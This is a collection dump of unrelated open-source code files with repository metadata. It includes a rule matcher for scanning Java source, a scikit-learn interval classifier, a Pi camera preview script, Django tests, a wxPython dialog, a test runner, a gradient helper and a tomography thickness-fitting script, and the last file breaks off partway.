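def rule_matches(rule, src, perms):
    # Honor input_case before matching (docstring section 5).
    data = src.lower() if rule['input_case'] == 'lower' else src
    match = rule['match']
    if match == 'single_regex':
        return bool(re.findall(rule['regex1'], data))
    if match == 'regex_and':
        return bool(re.findall(rule['regex1'], data)) and bool(re.findall(rule['regex2'], data))
    if match == 'string_and':
        return rule['string1'] in data and rule['string2'] in data
    if match == 'string_and_perm':
        return rule['string1'] in data and rule['perm'] in perms
    raise NotImplementedError(match)  # remaining strategies follow the docstring

supported = {'single_regex', 'regex_and', 'string_and', 'string_and_perm'}
src = open('Example.java').read()  # placeholder path
findings = [r['desc'] for r in RULES
            if r['match'] in supported and rule_matches(r, src, perms=[])]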
gpl-3.0
4,659,156,025,997,647,000
33.277064
246
0.512379
false
3.44861
false
false
false
vene/ambra
ambra/classifiers.py
1
6082
import numpy as np from sklearn.base import BaseEstimator from sklearn.linear_model import LogisticRegression, Ridge from sklearn.utils.extmath import safe_sparse_dot from sklearn.utils.validation import check_random_state from pairwise import pairwise_transform, flip_pairs def _nearest_sorted(scores, to_find, k=10): position = np.searchsorted(scores, to_find) width = k / 2 offset = k % 2 if position < width: return slice(None, k) elif position > len(scores) - width - offset: return slice(-k, None) else: return slice(position - width, position + width + offset) def _interval_dist(a, b): a_lo, a_hi = a b_lo, b_hi = b if b_lo >= a_lo and b_hi <= a_hi: # b contained in a return 0.0 else: return np.abs(0.5 * (b_lo + b_hi - a_lo - a_hi)) class DummyIntervalClassifier(BaseEstimator): """Dummy predictor that chooses one of the possible intervals. Possible target intervals have to be passed along with each training instance. Can be used as a simple baseline for sanity-checking. Parameters ---------- method: {"center" (default)|"random"}, If "center", always predicts the middle interval from the list given. If "random", an interval is uniformly picked. random_state: None (default) int or np.random object, Seed for the random number generator. Only used if `method="random"`. """ def __init__(self, method="center", random_state=None): self.method = method self.random_state = random_state def fit(self, X, Y): pass def _predict_interval(self, possible_intervals, rng=None): if self.method == "center": return possible_intervals[len(possible_intervals) / 2] elif self.method == "random": if rng is None: rng = check_random_state(self.random_state) return possible_intervals[rng.randint(len(possible_intervals))] def predict(self, X, Y_possible): if self.method == "random": rng = check_random_state(self.random_state) else: rng = None return [self._predict_interval(possible_intervals, rng) for possible_intervals in Y_possible] class IntervalRidge(Ridge): def predict(self, X, Y_possible): predicted_years = super(IntervalRidge, self).predict(X) predicted_intervals = np.array([self.get_interval(possible_intervals, predicted_year) for possible_intervals, predicted_year in zip(Y_possible, predicted_years)]) return predicted_intervals def fit(self, X, Y): Y_regression = np.array([np.mean(y) for y in Y]) return super(IntervalRidge, self).fit(X, Y_regression) def get_interval(self, intervals, year): year = int(year) # if the year is not included in any of the intervals, # it is situated either to the left or to the right of the possible intervals if year < intervals[0][0]: return intervals[0] elif year > intervals[-1][1]: return intervals[-1] else: # TODO: can be implemented with np.searchsorted for interval in intervals: if interval[0] <= year <= interval[1]: return interval class IntervalLogisticRegression(LogisticRegression): def __init__(self, penalty='l2', dual=False, tol=1e-4, C=1.0, random_state=None, solver='liblinear', max_iter=100, multi_class='ovr', verbose=0, n_neighbors=5, limit_pairs=1.0): self.penalty = penalty self.dual = dual self.tol = tol self.C = C self.fit_intercept = False self.intercept_scaling = 1 self.class_weight = None self.random_state = random_state self.solver = solver self.max_iter = max_iter self.multi_class = multi_class self.verbose = verbose self.n_neighbors = n_neighbors self.limit_pairs = limit_pairs self.loss = 'lr' # required for sklearn 0.15.2 def fit(self, X, y): rng = check_random_state(self.random_state) X_pw = pairwise_transform(X, y, limit=self.limit_pairs, random_state=rng) 
X_pw, y_pw = flip_pairs(X_pw, random_state=rng) self.n_pairs_ = len(y_pw) super(IntervalLogisticRegression, self).fit(X_pw, y_pw) train_scores = safe_sparse_dot(X, self.coef_.ravel()) order = np.argsort(train_scores) self.train_intervals_ = y[order] self.train_scores_ = train_scores[order] return self def score(self, X, y): print("pairwise accuracy is used") X_pw = pairwise_transform(X, y) X_pw, y_pw = flip_pairs(X_pw, random_state=0) # not fair return super(IntervalLogisticRegression, self).score(X_pw, y_pw) def _predict_interval(self, score, possible_intervals): interval_scores = [sum(_interval_dist(cand, nearest) for nearest in self.train_intervals_[ _nearest_sorted(self.train_scores_, score, k=self.n_neighbors)]) for cand in possible_intervals] return possible_intervals[np.argmin(interval_scores)] def predict(self, X, Y_possible): pred_scores = safe_sparse_dot(X, self.coef_.ravel()) return [self._predict_interval(score, possible_intervals) for score, possible_intervals in zip(pred_scores, Y_possible)] if __name__ == '__main__': X = np.arange(10)[:, np.newaxis] Y = [[4, 7], [1, 3], [2, 4], [8, 15], [5, 6], [1, 2], [10, 11], [10, 12], [10, 13], [10, 14]] from sklearn.cross_validation import KFold, cross_val_score from sklearn.utils import shuffle X, Y = shuffle(X, Y, random_state=0) print cross_val_score(IntervalLogisticRegression(C=1.0), X, Y, cv=KFold(len(X), n_folds=3))
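Two quick checks of the helpers above. `_interval_dist` is zero when the candidate interval is contained in the reference and otherwise the absolute distance between the midpoints; `_nearest_sorted` returns a slice covering the k training scores nearest to a query. The values in the comments follow directly from the definitions above:

print(_interval_dist((4, 7), (5, 6)))     # 0.0: (5, 6) is contained in (4, 7)
print(_interval_dist((4, 7), (8, 15)))    # 6.0: |0.5 * (8 + 15 - 4 - 7)|

scores = np.arange(10.0)                  # sorted training scores 0..9
print(_nearest_sorted(scores, 4.2, k=4))  # slice(3, 7): scores 3, 4, 5, 6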
bsd-2-clause
3,683,267,477,776,859,000
37.0125
93
0.598652
false
3.794136
false
false
false
ch1bo/ambicam
preview.py
1
3567
# Interactive preview module, run with python -i import cv2 import numpy as np import picamera import picamera.array import sys import multiprocessing as mp RESOLUTION = (640,480) FRAMERATE = 5 OFFSET = 10 M = np.load('M.npy') width, height = np.load('res.npy') def compute_map(M_inv, x, y, width, height): coords = [] for j in range(int(y), int(y+height)): for i in range(int(x), int(x+width)): coords.append([i, j, 1]) return np.dot(M_inv, np.array(coords).T).astype('float32') class HyperionOutput(picamera.array.PiRGBAnalysis): def __init__(self, camera, M, width, height, offset=10): super(HyperionOutput, self).__init__(camera) self.finished = mp.Event() self.M_inv = np.linalg.inv(M) self.width = int(width) self.height = int(height) self.offset = offset # Calculate source image maps self.top_map = compute_map(self.M_inv, 0, 0, width, offset) self.left_map = compute_map(self.M_inv, 0, offset, offset, height-2*offset) self.right_map = compute_map(self.M_inv, width-offset, offset, offset, height-2*offset) self.bottom_map = compute_map(self.M_inv, 0, height-offset, width, offset) # TODO cv2.convertMaps to make them fix-point -> faster? def analyze(self, img): # warped = cv2.warpPerspective(img, M, (width,10)) # Warp image map-by-map top = cv2.remap(img, self.top_map[0], self.top_map[1], cv2.INTER_LINEAR).reshape(self.offset,self.width,3) left = cv2.remap(img, self.left_map[0], self.left_map[1], cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3) right = cv2.remap(img, self.right_map[0], self.right_map[1], cv2.INTER_LINEAR).reshape(self.height-2*self.offset,self.offset,3) bottom = cv2.remap(img, self.bottom_map[0], self.bottom_map[1], cv2.INTER_LINEAR).reshape(self.offset,self.width,3) # Stitch and preview cv2.imshow('original', img) warped = np.zeros((self.height, self.width, 3), dtype='uint8') warped[:self.offset,:] += top warped[self.offset:-self.offset,:self.offset] += left warped[self.offset:-self.offset,self.width-self.offset:] += right warped[self.height-self.offset:,:] += bottom cv2.imshow('warped', warped) if cv2.waitKey(100) & 0xFF == ord("q"): self.finished.set() def settings(camera): print('analog_gain: ', camera.analog_gain) print('awb_mode: ', camera.awb_mode) print('awb_gains: ', camera.awb_gains) print('brightness: ', camera.brightness) print('contrast: ', camera.contrast) print('digital_gain: ', camera.digital_gain) print('exposure_mode: ', camera.exposure_mode) print('exposure_speed: ', camera.exposure_speed) print('iso: ', camera.iso) print('saturation: ', camera.saturation) print('sensor_mode: ', camera.sensor_mode) print('sharpness: ', camera.sharpness) print('shutter_speed: ', camera.shutter_speed) print('video_denoise: ', camera.video_denoise) print('video_stabilization: ', camera.video_stabilization) print('zoom: ', camera.zoom) with picamera.PiCamera(resolution=RESOLUTION, framerate=FRAMERATE) as camera: settings(camera) with HyperionOutput(camera, M, width, height, offset=OFFSET) as output: camera.start_recording(output, 'bgr') while not output.finished.wait(100): pass camera.stop_recording()
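compute_map builds the lookup tables for cv2.remap by pushing every destination pixel through the inverse transform M_inv. Note that it skips the perspective divide, which is only exact when M is affine. A self-contained sketch of the same idea with the divide included, so it also holds for a full homography (the function and variable names here are illustrative, not from this module):

import numpy as np
import cv2

def build_remap_tables(M_inv, x, y, width, height):
    # Destination pixel grid in homogeneous coordinates, shape (3, H*W).
    xs, ys = np.meshgrid(np.arange(x, x + width), np.arange(y, y + height))
    dst = np.stack([xs, ys, np.ones_like(xs)]).reshape(3, -1).astype(np.float64)
    src = M_inv @ dst
    src /= src[2]  # perspective divide; a no-op when M_inv is affine
    map_x = src[0].reshape(height, width).astype(np.float32)
    map_y = src[1].reshape(height, width).astype(np.float32)
    return map_x, map_y

# warped = cv2.remap(img, map_x, map_y, cv2.INTER_LINEAR)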
mpl-2.0
-1,066,425,132,792,566,400
41.464286
95
0.630782
false
3.225136
false
false
false
yuri-kilochek/graphematizer
tests/run.py
1
5005
import os import os.path import subprocess import argparse import collections import itertools import time import sys GRAPHEMATIZER_PATH = os.path.normpath('../graphematizer') TERMINAL_WIDTH = 80 arg_parser = argparse.ArgumentParser() arg_parser.add_argument('test_set', help='Test set to run.') arg_parser.add_argument('-c', '--concurrency', type=int, default=(os.cpu_count() or 4)**3, help='Max amount of tests to run concurrently.' ' Defaults to CPU count cubed or 16 if is is unavailable.') arg_parser.add_argument('-t', '--score_threshold', type=float, default=0.0, help='If a test scores below this value it will be shown. Default to 0.0, showing no tests.') args = arg_parser.parse_args() def lcs_len(a, b): m = len(a) n = len(b) c = [[0] * (n + 1)] * (m + 1) for i in range(1, m + 1): for j in range(1, n + 1): if a[i - 1] == b[j - 1]: c[i][j] = c[i - 1][j - 1] + 1 else: c[i][j] = max(c[i][j - 1], c[i - 1][j]) return c[m][n] def load_graphemes(graphemes_pathname): with open(graphemes_pathname, 'r', encoding='utf-8') as file: return [g.rstrip() for g in file.readlines()] class Tester: def __init__(self, test_id): self._test_id = test_id plaintext_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'plaintext.txt') self._true_graphemes_path = os.path.join(args.test_set, 'tests', os.path.join(*test_id), 'graphemes.txt') self._test_graphemes_path = '~{}-{}-graphemes.txt'.format(args.test_set, '-'.join(test_id)) self._process = subprocess.Popen([GRAPHEMATIZER_PATH, os.path.relpath(plaintext_path, GRAPHEMATIZER_PATH), os.path.relpath(self._test_graphemes_path, GRAPHEMATIZER_PATH)]) self._result = None @property def result(self): if self._result is None: self._process.poll() if self._process.returncode is None: return None if self._process.returncode != 0: raise Exception('Test {} is bad.'.format('/'.join(self._test_id))) true_graphemes = load_graphemes(self._true_graphemes_path) test_graphemes = load_graphemes(self._test_graphemes_path) os.remove(self._test_graphemes_path) total = len(true_graphemes) match = lcs_len([g[2:] for g in true_graphemes], [g[2:] for g in test_graphemes]) match_marked = lcs_len(true_graphemes, test_graphemes) self._result = self._test_id, total, match, match_marked return self._result def enumerate_tests(): def enumerate_tests(path, test_id): for _, dirs, files in os.walk(path): if 'plaintext.txt' in files: yield test_id else: for dir in dirs: yield from enumerate_tests(os.path.join(path, dir), test_id + [dir]) break yield from enumerate_tests(os.path.join(args.test_set, 'tests'), []) def do_tests(): testers = collections.deque() test_ids = iter(enumerate_tests()) while True: while testers and testers[0].result is not None: yield testers.popleft().result active_count = 0 for tester in testers: if tester.result is None: active_count += 1 if active_count < args.concurrency: next_id = next(test_ids, None) if next_id is None: break testers.append(Tester(next_id)) else: time.sleep(sys.float_info.epsilon) while testers: if testers[0].result is not None: yield testers.popleft().result else: time.sleep(sys.float_info.epsilon) def compute_scores(total, match, match_marked): if total > 0: return match / total, match_marked / total else: return 1.0, 1.0 total = 0 match = 0 match_marked = 0 print('bad tests (with score below {}):'.format(args.score_threshold)) print(' {:>14} | {:>14} | {}'.format('score', 'score marked', 'id')) for i, (i_id, i_total, i_match, i_match_marked) in enumerate(do_tests()): i_score, i_score_marked = compute_scores(i_total, i_match, 
i_match_marked) if i_score < args.score_threshold or i_score_marked < args.score_threshold: text = '{:>14.3f}% | {:>14.3f}% | {}'.format(i_score * 100, i_score_marked * 100, '/'.join(i_id)) print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\n') total += i_total match += i_match; match_marked += i_match_marked score, score_marked = compute_scores(total, match, match_marked) text = '{:>14.3f}% | {:>14.3f}% | <total over {} tests>'.format(score * 100, score_marked * 100, i + 1) print(text, end=' ' * (TERMINAL_WIDTH - 1 - len(text)) + '\r') print() print('Done.')
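One caveat in lcs_len above: `c = [[0] * (n + 1)] * (m + 1)` replicates a single row object m+1 times, so every write to c[i][j] is visible from all rows and the recurrence reads corrupted values. A corrected sketch of the same LCS-length computation using one rolling row (same O(mn) time, O(n) memory):

def lcs_len_fixed(a, b):
    prev = [0] * (len(b) + 1)
    for x in a:
        cur = [0]
        for j, y in enumerate(b, 1):
            cur.append(prev[j - 1] + 1 if x == y else max(cur[j - 1], prev[j]))
        prev = cur
    return prev[-1]

assert lcs_len_fixed('abcde', 'ace') == 3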
gpl-3.0
-6,139,452,096,908,997,000
32.817568
117
0.57003
false
3.294931
true
false
false
ceos-seo/data_cube_utilities
data_cube_utilities/transect/interpolate.py
1
1702
import numpy as np from itertools import islice nan = np.nan def window(seq, n=2): "Returns a sliding window (of width n) over data from the iterable" " s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... " it = iter(seq) result = tuple(islice(it, n)) if len(result) == n: yield result for elem in it: result = result[1:] + (elem,) yield result def hex_to_rgb(rgbstr): rgbstr= rgbstr.replace('#','') hex_prefix = '0x' r = hex_prefix + rgbstr[:2] g = hex_prefix + rgbstr[2:4] b = hex_prefix + rgbstr[4:] return np.array([int(r, 16), int(g, 16), int(b, 16)]) def _bin_and_index(value, size): '''Takes two arguments. value and size. value is a float between 0 and 1, size is the number of bins into which we divide the range 0 and 1. An index is returned denoting which of these bins value falls into ''' for i in range(size): if value > i/size and value <= (i + 1)/size: return i return 0 def get_gradient(colors, value): ''' make sure the value is between 0 and 1. If the value is between 0 and 1, you will get interpolated values in between. This displays gradients with quadruple digit precision ''' if np.isnan(value): return np.array([nan,nan,nan]) colors = [np.array(hex_to_rgb(color)) for color in colors] color_pairs = list(window(colors)) size = len(color_pairs) index = _bin_and_index(value,size) color1,color2 = color_pairs[index] direction = (color2 - color1).astype(float) v = value * size - index return (v * direction) + color1
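A quick usage check of the interpolation above: halfway along a two-color black-to-white ramp lands at mid-gray, and NaN values propagate through unchanged:

print(get_gradient(['#000000', '#ffffff'], 0.5))     # [127.5 127.5 127.5]
print(get_gradient(['#000000', '#ffffff'], np.nan))  # [nan nan nan]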
apache-2.0
-6,673,177,766,192,212,000
28.859649
125
0.583431
false
3.431452
false
false
false
prabhugs/mynote
mynote/notes/tests.py
1
1217
from django.test import TestCase import datetime from django.utils import timezone from notes.models import Post # Create your tests here. class PostMethodTests(TestCase): def test_waspublishedrecently_with_future_post(self): """ :return: False for a post whose published_date is in the future """ time = timezone.datetime.now() + datetime.timedelta(days=30) future_post = Post(published_date = time) self.assertEqual(future_post.waspublishedrecently(), False) def test_waspublishedrecently_with_old_post(self): """ :return: False for a post whose published_date is more than 24 hours in the past """ time = timezone.datetime.now() - datetime.timedelta(days=30) old_post = Post(published_date = time) self.assertEqual(old_post.waspublishedrecently(), False) def test_waspublishedrecently_with_recent_post(self): """ :return: True for a post whose published_date is within the last 24 hours """ time = timezone.datetime.now() - datetime.timedelta(hours=1) recent_post = Post(published_date = time) self.assertEqual(recent_post.waspublishedrecently(), True)
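The three tests pin down the contract of Post.waspublishedrecently: False for future dates, False beyond 24 hours in the past, True within the last 24 hours. The real method lives in notes/models.py and is not shown here; a hypothetical implementation consistent with these tests would be:

import datetime
from django.utils import timezone

def waspublishedrecently(self):
    # Hypothetical sketch, mirroring the tests' use of timezone.datetime.now()
    now = timezone.datetime.now()
    return now - datetime.timedelta(days=1) <= self.published_date <= now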
mit
-825,587,557,338,921,200
37.0625
83
0.677896
false
4.070234
true
false
false
mikan/racm
src/racm_ui_edit_dialog.py
1
1597
"""Subclass of EditDialog, which is generated by wxFormBuilder.""" import wx import racm_ui # Implementing EditDialog class EditDialog(racm_ui.EditDialog): _main_frame = None _row = -1 def __init__(self, parent, main_frame, host, port, name, row): racm_ui.EditDialog.__init__(self, parent) self._main_frame = main_frame self.port_text.SetValue(str(port)) self.host_text.SetValue(host) self.port_text.SetValue(port) self.name_text.SetValue(name) self._row = row def show_dialog(self, message): dialog = wx.MessageDialog(None, message, self.GetTitle(), wx.OK | wx.ICON_WARNING) dialog.ShowModal() dialog.Destroy() def show_missing_error(self, value_type): self.show_dialog("Please input the " + value_type + ".") def show_illegal_error(self, value_type, character): self.show_dialog("Illegal character \"" + character + "\" contained in " + value_type + ".") # Handlers for EditDialog events. def on_ok_clicked(self, event): if self.host_text.IsEmpty(): self.show_missing_error("host") return if ":" in self.host_text.Value: self.show_illegal_error("host", ":") return if self.port_text.IsEmpty(): self.show_missing_error("port") return host = self.host_text.Value + ":" + self.port_text.Value self._main_frame.edit_item(host, self.name_text.Value, "", self._row) self.Destroy() def on_cancel_clicked(self, event): self.Destroy()
bsd-3-clause
-3,549,579,078,472,662,500
32.270833
100
0.603632
false
3.629545
false
false
false
jianglab/tomography
tomoThickness.py
1
32556
#!/usr/bin/env python # # Author: Rui Yan <yan49@purdue.edu>, Sep 2015 # Copyright (c) 2012 Purdue University # # This software is issued under a joint BSD/GNU license. You may use the # source code in this file under either license. However, note that the # complete EMAN2 and SPARX software packages have some GPL dependencies, # so you are responsible for compliance with the licenses of these packages # if you opt to use BSD licensing. The warranty disclaimer below holds # in either instance. # # This complete copyright notice must be included in any revised version of the # source code. Additional authorship citations may be added, but existing # author citations must be preserved. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 2111-1307 USA # # from EMAN2 import * import os, sys, math, itertools import numpy as np import scipy from scipy.optimize import minimize from scipy.optimize import basinhopping from scipy.optimize import leastsq from scipy.optimize import curve_fit import matplotlib.pyplot as plt import collections from itertools import chain from scipy import stats import matplotlib.cm as cm from matplotlib.backends.backend_pdf import PdfPages def main(): progname = os.path.basename(sys.argv[0]) usage = """ Determine the thickness, sample tilt and mean free path of tomographic tilt series Example: python tomoThickness.py --tiltseries 6hSINVc1s2_17.ali --tiltangles 6hSINVc1s2_17.tlt --boxsize 200 --MFP 200 --B 1600 --d0 200 --theta0 5 --alpha0 0 --niter 200 --interval 50 --x0 1200,1400,1000,2400,2900,2600,1400,800 --y0 1100,1400,2000,3600,2900,600,2800,2400 python tomoThickness.py --tiltseries virus009.ali --tiltangles virus009.tlt --boxsize 200 --B 240 --d0 100 --alpha0 0 --theta0 0 --niter 400 --interval 50 --x0 1600,1500,1600,300 --y0 1600,1700,1800,300 """ parser = EMArgumentParser(usage=usage,version=EMANVERSION) parser.add_argument("--tiltseries", type=str, default='', help="tilt series with tilt axis along Y") parser.add_argument('--tiltangles',type=str,default='',help='File in .tlt format containing the tilt angle of each image in the tiltseries.') parser.add_argument("--boxsize", type=int, default=200, help="perform grid boxing using given box size. 
default to 200") parser.add_argument("--x0", type=str, default=0, help="for test on some regions, multiple regions are allowed, --x0 100,200,300") parser.add_argument("--y0", type=str, default=0, help="for test on some regions, multiple regions are allowed, --y0 100,200,300") parser.add_argument("--adaptiveBox", action="store_true", default=False, help="squeeze the x side of boxsize by cos(theta(tlt))") parser.add_argument("--writeClippedRegions", action="store_true", default=False, help="write out the clipped region of interest, test only") #try to determine I0 from the intercept of the graph #parser.add_argument("--I0", type=float, default=2000, help="whole spectrum I0") parser.add_argument("--d0", type=float, default=100, help="initial thickness") parser.add_argument("--theta0", type=float, default=0, help="offset of angle theta (the initial offset angle around y-axis)") parser.add_argument("--alpha0", type=float, default=0, help="offset of angle alpha (the initial offset angle around x-axis)") #assume A == 1 parser.add_argument("--A", type=float, default=1, help="scaling factor of I0") parser.add_argument("--B", type=float, default=0, help="# of electrons = gain * pixel_value + B") parser.add_argument("--MFP", type=float, default=350, help="mean free path, for vitreous ice, 350nm@300kV, 300nm@200kV") #parser.add_argument("--k", type=float, default=0, help="I0(theta) = I0/(cos(theta)**k), and 0=<k<=1") parser.add_argument("--addOffset", type=str, default='-32000', help="Add options.addOffset to pixel values") #parser.add_argument("--inversePixel", action="store_true", default=False, help="inverse pixel values") parser.add_argument("--plotData", action="store_true", default=False, help="plot the original data, including curvilinear mode and linear mode") parser.add_argument("--plotResults", action="store_true", default=False, help="plot the original data and fitted results, including curvilinear mode and linear mode") parser.add_argument("--mode", type=int, default=0, help="") parser.add_argument("--niter", type=int, default=200, help="niter in basinhopping") parser.add_argument("--interval", type=int, default=50, help="interval in basinhopping") parser.add_argument("--T", type=float, default=1e-4, help="T in basinhopping") parser.add_argument("--modifyTiltFile", action="store_true", default=False, help="modify the .tlt file by returned theta0") parser.add_argument('--modifiedTiltName',type=str,default='',help='the filename of modified tilt angles') #parser.add_argument("--refineRegion", action="store_true", default=False, help="use returned theta0 to re-clip region and re-do optimization") parser.add_argument('--logName',type=str,default='',help='the name of the log file which contains the output') parser.add_argument("--verbose", "-v", dest="verbose", action="store", metavar="n", type=int, default=0, help="verbose level, higner number means higher level of verboseness") parser.add_argument("--ppid", type=int, help="Set the PID of the parent process, used for cross platform PPID",default=-1) global options (options, args) = parser.parse_args() logger = E2init(sys.argv, options.ppid) serieshdr = EMData(options.tiltseries,0,True) global nslices nslices = serieshdr['nz'] nx = serieshdr['nx'] ny = serieshdr['ny'] print "\ntiltseries %s: %d*%d*%d"%(options.tiltseries, nx, ny, nslices) #read in tilt angles file, *.tlt anglesfile = open(options.tiltangles,'r') #Open tilt angles file alines = anglesfile.readlines() #Read its lines anglesfile.close() #Close the file #global tiltangles tiltangles 
= [ alines[i].replace('\n','') for i in range(len(alines)) ] #Eliminate trailing return character, '\n', for each line in the tiltangles file ntiltangles = len(tiltangles) tiltanglesArray = np.array(tiltangles) if (options.verbose>=10): print tiltangles blocks = [] boxsize = options.boxsize if (options.x0 and options.y0): x0 = [int(x) for x in options.x0.split(',')] y0 = [int(y) for y in options.y0.split(',')] else: print "Please provide the X/Y coordinates of selected regions using --x0 --y0\n" sys.exit(0) origDictionary = collections.OrderedDict() for k in range(nslices): angle = float(tiltangles[k]) r0 = Region(0, 0, k, nx, ny, 1) tiltedImg = EMData(options.tiltseries, 0, 0, r0) blockMeanList = [] for i in range(len(x0)): testname = options.tiltseries.split('.')[0]+'_x0%g_y0%g_clip.hdf'%(x0[i], y0[i]) xp = (x0[i] - nx/2.0) * math.cos(math.radians(angle)) + nx/2.0 yp = y0[i] if (options.adaptiveBox): boxsizeX = int(boxsize * math.cos(math.radians(angle))) else: boxsizeX = boxsize #extract the whole image at each tilt xp = xp-boxsizeX/2 yp = yp-boxsize/2 r = Region(xp, yp, boxsizeX, boxsize) img = tiltedImg.get_clip(r) if (options.writeClippedRegions): img.write_image(testname, k) blockMeanValues = blockMean(img, boxsizeX, boxsize) blockMeanList.append(blockMeanValues) origDictionary[tiltangles[k]] = flattenList(blockMeanList) #if (options.verbose>=10): print origDictionary assert(len(origDictionary)==len(tiltangles)) startZ = 0 endZ = nslices stepZ = 1 dictionary0 = collections.OrderedDict() n=0 for key, value in origDictionary.items()[startZ:endZ]: if (math.fmod(n, stepZ) == 0): dictionary0[key] = value n+=1 #print "len(dictionary)=", len(dictionary0) #check if the tilt angles are from negative to positive, if not, reverse the order of dictionary if (float(tiltangles[0]) > 0): print "Reversing the order of tilt angles since we usually start from negative tilts to positive tilts" items = dictionary0.items() items.reverse() dictionary0 = collections.OrderedDict(items) if (options.verbose>=10): print dictionary0 if (options.plotData): plotOriginalData(dictionary0, options) global dictionary #dictionary = averageRescaledResultDict(rescaledResultDict, options) dictionary = dictionary0 #use intercept as the initial value of I0 and set gain (A) == 1 thetaCurve, IntensityCurve, thetaLinear, IntensityLinear = generateData2(dictionary, options) oneResultDict = fitLinearRegression3(thetaLinear, IntensityLinear, tiltanglesArray, thetaCurve, IntensityCurve, options) I0 = calculateIntercept(oneResultDict, options) print "initial I0 =", I0 #options.I0 = I0 global maxVal, minVal maxKey, maxVal = max(dictionary.iteritems(), key=lambda x:x[1]) maxVal = maxVal[0] minKey, minVal = min(dictionary.iteritems(), key=lambda x:x[1]) minVal = minVal[0] print "max: max average pixel value = %g @ tilt angles =%s"%(maxVal, maxKey) print "min: min average pixel value = %g @ tilt angles =%s"%(minVal, minKey) if (options.mode == 0): #use complete model, use multiple regions print "Using complete model and %g boxes!"%len(x0) #I0 = options.I0 d0 = options.d0 theta0 = options.theta0 alpha0 = options.alpha0 A = options.A B = options.B MFP = options.MFP niter = options.niter interval = options.interval p0 = [I0, d0, theta0, alpha0, A, B, MFP] #p0 = [I0, d0, theta0, alpha0, B, MFP] x0 = p0 boundsList = [(maxVal, None),(10, 250), (-10, 10), (-10, 10), (0.01, None), (None, int(minVal)), (1, None)] #boundsList = [(maxVal, None),(10, 250), (-10, 10), (-10, 10), (None, int(minVal)), (1, None)] minimizer_kwargs = 
dict(method="L-BFGS-B", bounds=boundsList) mybounds = MyBounds() mybounds.xmax=[float('inf'), 250.0, 10.0, 10.0, float('inf'), int(minVal), float('inf')] mybounds.xmin=[maxVal, 10.0, -10.0, -10.0, 0.01, (-1)*(float('inf')), 1.0] #mybounds.xmax=[float('inf'), 250.0, 10.0, 10.0, int(minVal), float('inf')] #mybounds.xmin=[maxVal, 10.0, -10.0, -10.0, (-1)*(float('inf')), 1.0] mytakestep = MyTakeStep3() res = scipy.optimize.basinhopping(optimizationFuncFullModel0, x0, T=options.T, stepsize=0.01, minimizer_kwargs=minimizer_kwargs, niter=niter, take_step=mytakestep, accept_test=mybounds, \ callback=None, interval=interval, disp=False, niter_success=None) #print res tmp = res.x.tolist() #tmp[1] = tmp[1]+100 I0, d0, theta0, alpha0, A, B, MFP = tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5], tmp[6] #I0, d0, theta0, alpha0, B, MFP = tmp[0], tmp[1], tmp[2], tmp[3], tmp[4], tmp[5] gamma0 = calculateGamma0(theta0, alpha0) print "[I0, d0, theta0, alpha0, A, B, MFP, gamma0] =", I0, d0, theta0, alpha0, A, B, MFP, gamma0 print "B/I0 = ", B/I0 print "***************************************************" print "Tilt series: %s"%options.tiltseries print "Fitting results:" print "Thickness = %g nm"%d0 print "Sample tilt: theta0 = %g degree, alpha0 = %g degree, gamma0 = %g degree"%(theta0, alpha0, gamma0) print "Mean free path = %g nm"%MFP if (options.logName): logName = options.logName else: logName = options.tiltseries.split(".")[0] + ".log" fp = open(logName, 'w') fp.write("Tilt series: %s\n"%options.tiltseries) fp.write("Fitting results:\n") fp.write("Thickness = %g nm\n"%d0) fp.write("Sample tilt: theta0 = %g degree, alpha0 = %g degree, gamma0 = %g degree\n"%(theta0, alpha0, gamma0)) fp.write("Mean free path = %g nm\n"%MFP) fp.close() if (options.plotResults): compareFitData(dictionary, tmp, options) if (options.modifyTiltFile): if (options.modifiedTiltName): tiltFile = options.modifiedTiltName else: tiltFile = options.tiltseries.split(".")[0] + "_modified.tlt" fp = open(tiltFile, 'w') for i in tiltangles: tlt = float(i) + theta0 #print float(tlt) line = "%g\n"%(tlt) fp.write(line) fp.close() def calculateIntercept(oneResultDict, options): interceptLeftArray = np.array([]) interceptRightArray = np.array([]) for boxPosition, value in oneResultDict.iteritems(): interceptLeftArray = np.append(interceptLeftArray, value['interceptLeft']) interceptRightArray = np.append(interceptRightArray, value['interceptRight']) interceptArray = np.append(interceptLeftArray, interceptRightArray) interceptMedian = np.median(interceptArray) #print interceptArray initialI0 = exp(interceptMedian) return initialI0 def fitLinearRegression3(thetaLinear, IntensityLinear, tiltanglesArray, thetaCurve, IntensityCurve, options): x0 = [int(x) for x in options.x0.split(',')] y0 = [int(y) for y in options.y0.split(',')] resultDict = collections.OrderedDict() #returnDict = collections.OrderedDict() allResLeft = [] allResRight = [] for i in range(len(x0)): iIntensityLinear = IntensityLinear[:, i] iIntensityCurve = IntensityCurve[:, i] key = '%g %g'%(x0[i], y0[i]) #print "x0, y0 =", key ret = fitOneLinearRegression(thetaLinear, iIntensityLinear, tiltanglesArray, options) fres, stdRes, xLeft, yLeft, fitLeft, xRight, yRight, fitRight, indexLargeLeft, indexLargeRight, indexSmallLeft, indexSmallRight, resLeft, resRight, slopeLeft, interceptLeft, slopeRight, interceptRight = ret resultDict[key] = {} resultDict[key]['SSE'] = fres resultDict[key]['intensityCurve'] = iIntensityCurve resultDict[key]['tiltAngles'] = thetaCurve resultDict[key]['stdRes'] = 
